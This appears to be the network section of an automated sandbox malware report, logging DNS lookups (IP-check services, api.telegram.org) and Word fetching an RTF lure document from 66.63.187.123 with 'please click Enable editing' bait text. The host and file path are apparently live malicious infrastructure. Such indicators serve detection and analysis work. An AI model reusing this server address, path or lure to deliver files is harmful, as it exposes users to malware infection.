                                                                                                            Sep 27, 2024 16:01:05.996714115 CEST8.8.8.8192.168.2.220x7de2No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:05.996714115 CEST8.8.8.8192.168.2.220x7de2No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:05.996714115 CEST8.8.8.8192.168.2.220x7de2No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:05.996714115 CEST8.8.8.8192.168.2.220x7de2No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:07.611733913 CEST8.8.8.8192.168.2.220x5102No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:07.611733913 CEST8.8.8.8192.168.2.220x5102No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:08.274750948 CEST8.8.8.8192.168.2.220xd212No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • reallyfreegeoip.org
                                                                                                            • api.telegram.org
                                                                                                            • 66.63.187.123
                                                                                                            • checkip.dyndns.org

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.224916366.63.187.123803260C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Sep 27, 2024 16:00:23.014305115 CEST139OUTOPTIONS /txt/ HTTP/1.1
                                                                                                            User-Agent: Microsoft Office Protocol Discovery
                                                                                                            Host: 66.63.187.123
                                                                                                            Content-Length: 0
                                                                                                            Connection: Keep-Alive
                                                                                                            Sep 27, 2024 16:00:26.744024992 CEST187INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.26.2
                                                                                                            Date: Fri, 27 Sep 2024 14:00:26 GMT
                                                                                                            Content-Type: httpd/unix-directory
                                                                                                            Content-Length: 0
                                                                                                            Connection: keep-alive
                                                                                                            Allow: OPTIONS,HEAD,GET,POST
                                                                                                            Sep 27, 2024 16:00:35.188832998 CEST360OUTGET /txt/millizxc.doc HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                                                                                            UA-CPU: AMD64
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: 66.63.187.123
                                                                                                            Connection: Keep-Alive
                                                                                                            Sep 27, 2024 16:00:35.433509111 CEST252INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.26.2
                                                                                                            Date: Fri, 27 Sep 2024 14:00:35 GMT
                                                                                                            Content-Type: application/msword
                                                                                                            Content-Length: 535897
                                                                                                            Last-Modified: Fri, 27 Sep 2024 01:08:13 GMT
                                                                                                            Connection: keep-alive
                                                                                                            ETag: "66f6057d-82d59"
                                                                                                            Accept-Ranges: bytes
                                                                                                            Sep 27, 2024 16:00:35.433648109 CEST1236INData Raw: 7b 5c 72 74 0d 0d 7b 5c 2a 5c 43 6d 36 36 62 48 63 65 73 79 49 66 79 55 54 39 67 37 65 68 33 43 36 58 45 71 6e 70 54 75 55 4c 4e 41 42 43 4e 6c 67 76 63 79 61 75 71 33 4b 72 69 5a 65 65 4d 6a 39 55 35 39 48 36 51 70 51 52 4f 48 48 51 79 34 58 36
                                                                                                            Data Ascii: {\rt{\*\Cm66bHcesyIfyUT9g7eh3C6XEqnpTuULNABCNlgvcyauq3KriZeeMj9U59H6QpQROHHQy4X6xRjrtJQ7LTZ5U18un71s5rF9mYDTP6SIQlW8A8247DBeU0JwuAnpUwDe3NjyiljhYOiPgQRtYCI0MazkvhNbexc5m9davxdSrg7LV8vjBrgnAdR}{\334481354please click Enable editing from the
                                                                                                            Sep 27, 2024 16:00:35.433826923 CEST224INData Raw: 64 6f 65 73 6e 92 74 20 6e 65 63 65 73 73 61 72 69 6c 79 20 6d 65 61 6e 20 74 68 61 74 20 79 6f 75 72 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 73 20 61 72 65 20 77 6f 72 6b 69 6e 67 2e 20 41 73 20 6c 6f 6e 67 20 61 73 20 74 68 65 72 65
                                                                                                            Data Ascii: doesnt necessarily mean that your internal controls are working. As long as theres a reasonable possibility for material misstatement of account balances or financial statement disclosures, your internal controls are consi
                                                                                                            Sep 27, 2024 16:00:35.433914900 CEST1236INData Raw: 64 65 72 65 64 20 74 6f 20 62 65 20 64 65 66 69 63 69 65 6e 74 2e 41 75 64 69 74 6f 72 73 20 65 76 61 6c 75 61 74 65 20 65 61 63 68 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 20 64 65 66 69 63 69 65 6e 63 79 20 6e 6f 74 65 64 20 64 75 72
                                                                                                            Data Ascii: dered to be deficient.Auditors evaluate each internal control deficiency noted during the audit to determine whether the deficiency, or a combination of deficiencies, is severe enough to be considered a material weakness or significant deficie
                                                                                                            Sep 27, 2024 16:00:35.433927059 CEST1236INData Raw: 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 94 20 6c 61 63 6b 73 20 61 20 72 65 61 73 6f 6e 61 62 6c 65 20 65 78 70 6c 61 6e 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 64 65 63 69 73 69 6f 6e 2e 20 46 6f 72 20 65 78 61 6d 70 6c 65 2c 20 6e 6f 6e 70 72 6f
                                                                                                            Data Ascii: organization lacks a reasonable explanation for the decision. For example, nonprofits that lack the ability to prepare their own financial statements often find it cost prohibitive to remedy the deficiency by training current employees or by
                                                                                                            Sep 27, 2024 16:00:35.433938026 CEST1236INData Raw: 74 74 65 6e 20 63 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 20 66 6f 72 20 76 61 72 69 6f 75 73 20 72 65 61 73 6f 6e 73 2e 20 49 74 20 63 61 6e 20 62 65 20 61 20 77 61 79 20 74 6f 20 65 6e 73 75 72 65 20 74 68 61 74 20 61 6c 6c 20 61 70 70 72 6f 70 72
                                                                                                            Data Ascii: tten communication for various reasons. It can be a way to ensure that all appropriate parties are aware of a deficiency and have the opportunity to address it. Written communication also serves as a reference document for management in its on
                                                                                                            Sep 27, 2024 16:00:35.433952093 CEST672INData Raw: 72 74 61 6e 74 20 74 6f 20 6e 6f 74 65 20 74 68 61 74 20 74 68 65 69 72 20 63 6f 6e 73 69 64 65 72 61 74 69 6f 6e 20 6f 66 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 66 69 6e 61 6e 63 69 61 6c 20 73 74 61 74 65 6d 65 6e
                                                                                                            Data Ascii: rtant to note that their consideration of internal control over financial statement reporting is not conducted for the purpose of identifying all deficiencies in internal control that might be material weaknesses or significant deficiencies, o
                                                                                                            Sep 27, 2024 16:00:35.433967113 CEST1236INData Raw: 65 70 6f 72 74 2e 20 42 75 74 20 69 74 20 6d 61 79 20 68 65 6c 70 20 74 6f 20 75 6e 64 65 72 73 74 61 6e 64 20 69 74 73 20 70 75 72 70 6f 73 65 2e 20 54 68 65 20 4d 61 6e 61 67 65 6d 65 6e 74 20 4c 65 74 74 65 72 20 69 73 20 69 6e 74 65 6e 64 65
                                                                                                            Data Ascii: eport. But it may help to understand its purpose. The Management Letter is intended to provide management and those charged with governance with valuable information regarding their organization. Used properly, the Management Letter can be a b
                                                                                                            Sep 27, 2024 16:00:35.434290886 CEST1236INData Raw: 31 25 37 32 25 36 42 25 36 35 25 37 34 25 36 39 25 36 45 25 36 37 25 32 30 25 37 33 25 37 34 25 37 32 25 36 31 25 37 34 25 36 35 25 36 37 25 37 39 25 32 30 25 37 32 25 36 35 25 36 36 25 36 35 25 37 32 25 37 33 25 32 30 25 37 34 25 36 46 25 32 30
                                                                                                            Data Ascii: 1%72%6B%65%74%69%6E%67%20%73%74%72%61%74%65%67%79%20%72%65%66%65%72%73%20%74%6F%20%61%20%73%75%72%70%72%69%73%69%6E%67%20%61%64%76%65%72%74%69%73%69%6E%67%20%73%74%72%61%74%65%67%79%20%61%6E%64%20%77%69%74%68%20%75%6E%63%6F%6E%76%65%6E%74%69%6
                                                                                                            Sep 27, 2024 16:00:35.434303999 CEST1236INData Raw: 46 25 36 45 25 37 33 25 37 35 25 36 44 25 36 35 25 37 32 25 37 33 25 32 45 25 32 30 25 34 33 25 36 46 25 36 45 25 37 33 25 37 35 25 36 44 25 36 35 25 37 32 25 32 30 25 37 32 25 36 35 25 37 33 25 36 35 25 36 31 25 37 32 25 36 33 25 36 38 25 32 30
                                                                                                            Data Ascii: F%6E%73%75%6D%65%72%73%2E%20%43%6F%6E%73%75%6D%65%72%20%72%65%73%65%61%72%63%68%20%69%73%20%74%68%65%20%73%63%69%65%6E%74%69%66%69%63%20%70%72%6F%63%65%73%73%20%74%68%61%74%20%69%6D%70%72%6F%76%65%73%20%74%68%65%20%64%65%6D%61%6E%64%20%66%6F%7
                                                                                                            Sep 27, 2024 16:00:35.434315920 CEST1236INData Raw: 74 65 64 20 61 6e 64 20 63 6f 72 72 65 63 74 65 64 20 62 79 20 28 74 68 65 20 6e 6f 6e 70 72 6f 66 69 74 92 73 29 20 65 6d 70 6c 6f 79 65 65 73 20 69 6e 20 74 68 65 20 6e 6f 72 6d 61 6c 20 63 6f 75 72 73 65 20 6f 66 20 70 65 72 66 6f 72 6d 69 6e
                                                                                                            Data Ascii: ted and corrected by (the nonprofits) employees in the normal course of performing their duties. If the auditors detect an unexpected material misstatement during your audit, it could indicate that your internal controls are not functioning p
                                                                                                            Sep 27, 2024 16:00:36.526083946 CEST149OUTHEAD /txt/millizxc.doc HTTP/1.1
                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                            Host: 66.63.187.123
                                                                                                            Content-Length: 0
                                                                                                            Connection: Keep-Alive
                                                                                                            Sep 27, 2024 16:00:36.749515057 CEST252INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.26.2
                                                                                                            Date: Fri, 27 Sep 2024 14:00:36 GMT
                                                                                                            Content-Type: application/msword
                                                                                                            Content-Length: 535897
                                                                                                            Last-Modified: Fri, 27 Sep 2024 01:08:13 GMT
                                                                                                            Connection: keep-alive
                                                                                                            ETag: "66f6057d-82d59"
                                                                                                            Accept-Ranges: bytes


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.224916466.63.187.123803260C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Sep 27, 2024 16:00:27.158133984 CEST130OUTHEAD /txt/millizxc.doc HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                            Host: 66.63.187.123
                                                                                                            Sep 27, 2024 16:00:27.880678892 CEST252INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.26.2
                                                                                                            Date: Fri, 27 Sep 2024 14:00:27 GMT
                                                                                                            Content-Type: application/msword
                                                                                                            Content-Length: 535897
                                                                                                            Last-Modified: Fri, 27 Sep 2024 01:08:13 GMT
                                                                                                            Connection: keep-alive
                                                                                                            ETag: "66f6057d-82d59"
                                                                                                            Accept-Ranges: bytes
                                                                                                            Sep 27, 2024 16:00:28.233392954 CEST252INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.26.2
                                                                                                            Date: Fri, 27 Sep 2024 14:00:27 GMT
                                                                                                            Content-Type: application/msword
                                                                                                            Content-Length: 535897
                                                                                                            Last-Modified: Fri, 27 Sep 2024 01:08:13 GMT
                                                                                                            Connection: keep-alive
                                                                                                            ETag: "66f6057d-82d59"
                                                                                                            Accept-Ranges: bytes


                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                            2192.168.2.224916566.63.187.12380
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Sep 27, 2024 16:00:31.238878012 CEST133OUTOPTIONS /txt HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                                                            translate: f
                                                                                                            Host: 66.63.187.123
                                                                                                            Sep 27, 2024 16:00:31.978637934 CEST532INHTTP/1.1 301 Moved Permanently
                                                                                                            Server: nginx/1.26.2
                                                                                                            Date: Fri, 27 Sep 2024 14:00:31 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Content-Length: 312
                                                                                                            Connection: keep-alive
                                                                                                            Location: http://66.63.187.123/txt/
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 36 36 2e 36 33 2e 31 38 37 2e 31 32 33 2f 74 78 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 36 36 2e 36 33 2e 31 38 37 2e 31 32 33 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://66.63.187.123/txt/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 66.63.187.123 Port 80</address></body></html>
                                                                                                            Sep 27, 2024 16:00:32.002000093 CEST134OUTOPTIONS /txt/ HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                                                            translate: f
                                                                                                            Host: 66.63.187.123
                                                                                                            Sep 27, 2024 16:00:32.246141911 CEST187INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.26.2
                                                                                                            Date: Fri, 27 Sep 2024 14:00:32 GMT
                                                                                                            Content-Type: httpd/unix-directory
                                                                                                            Content-Length: 0
                                                                                                            Connection: keep-alive
                                                                                                            Allow: OPTIONS,HEAD,GET,POST
                                                                                                            Sep 27, 2024 16:00:32.726973057 CEST163OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 74 78 74 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52
                                                                                                            Data Ascii: PROPFIND /txt HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 66.63.187.123
                                                                                                            Sep 27, 2024 16:00:33.856931925 CEST532INHTTP/1.1 301 Moved Permanently
                                                                                                            Server: nginx/1.26.2
                                                                                                            Date: Fri, 27 Sep 2024 14:00:32 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Content-Length: 312
                                                                                                            Connection: keep-alive
                                                                                                            Location: http://66.63.187.123/txt/
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 36 36 2e 36 33 2e 31 38 37 2e 31 32 33 2f 74 78 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 36 36 2e 36 33 2e 31 38 37 2e 31 32 33 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://66.63.187.123/txt/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 66.63.187.123 Port 80</address></body></html>
                                                                                                            Sep 27, 2024 16:00:33.856990099 CEST532INHTTP/1.1 301 Moved Permanently
                                                                                                            Server: nginx/1.26.2
                                                                                                            Date: Fri, 27 Sep 2024 14:00:32 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Content-Length: 312
                                                                                                            Connection: keep-alive
                                                                                                            Location: http://66.63.187.123/txt/
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 36 36 2e 36 33 2e 31 38 37 2e 31 32 33 2f 74 78 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 36 36 2e 36 33 2e 31 38 37 2e 31 32 33 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://66.63.187.123/txt/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 66.63.187.123 Port 80</address></body></html>
                                                                                                            Sep 27, 2024 16:00:33.857158899 CEST532INHTTP/1.1 301 Moved Permanently
                                                                                                            Server: nginx/1.26.2
                                                                                                            Date: Fri, 27 Sep 2024 14:00:32 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Content-Length: 312
                                                                                                            Connection: keep-alive
                                                                                                            Location: http://66.63.187.123/txt/
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 36 36 2e 36 33 2e 31 38 37 2e 31 32 33 2f 74 78 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 36 36 2e 36 33 2e 31 38 37 2e 31 32 33 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://66.63.187.123/txt/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 66.63.187.123 Port 80</address></body></html>
                                                                                                            Sep 27, 2024 16:00:33.857306004 CEST164OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 74 78 74 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69
                                                                                                            Data Ascii: PROPFIND /txt/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 66.63.187.123
                                                                                                            Sep 27, 2024 16:00:34.081513882 CEST532INHTTP/1.1 301 Moved Permanently
                                                                                                            Server: nginx/1.26.2
                                                                                                            Date: Fri, 27 Sep 2024 14:00:32 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Content-Length: 312
                                                                                                            Connection: keep-alive
                                                                                                            Location: http://66.63.187.123/txt/
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 36 36 2e 36 33 2e 31 38 37 2e 31 32 33 2f 74 78 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 36 36 2e 36 33 2e 31 38 37 2e 31 32 33 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://66.63.187.123/txt/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 66.63.187.123 Port 80</address></body></html>
                                                                                                            Sep 27, 2024 16:00:34.487627983 CEST518INHTTP/1.1 405 Method Not Allowed
                                                                                                            Server: nginx/1.26.2
                                                                                                            Date: Fri, 27 Sep 2024 14:00:34 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Content-Length: 304
                                                                                                            Connection: keep-alive
                                                                                                            Allow: OPTIONS,HEAD,GET,POST
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 36 36 2e 36 33 2e 31 38 37 2e 31 32 33 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 66.63.187.123 Port 80</address></body></html>
                                                                                                            Sep 27, 2024 16:00:34.583549023 CEST518INHTTP/1.1 405 Method Not Allowed
                                                                                                            Server: nginx/1.26.2
                                                                                                            Date: Fri, 27 Sep 2024 14:00:34 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Content-Length: 304
                                                                                                            Connection: keep-alive
                                                                                                            Allow: OPTIONS,HEAD,GET,POST
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 36 36 2e 36 33 2e 31 38 37 2e 31 32 33 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
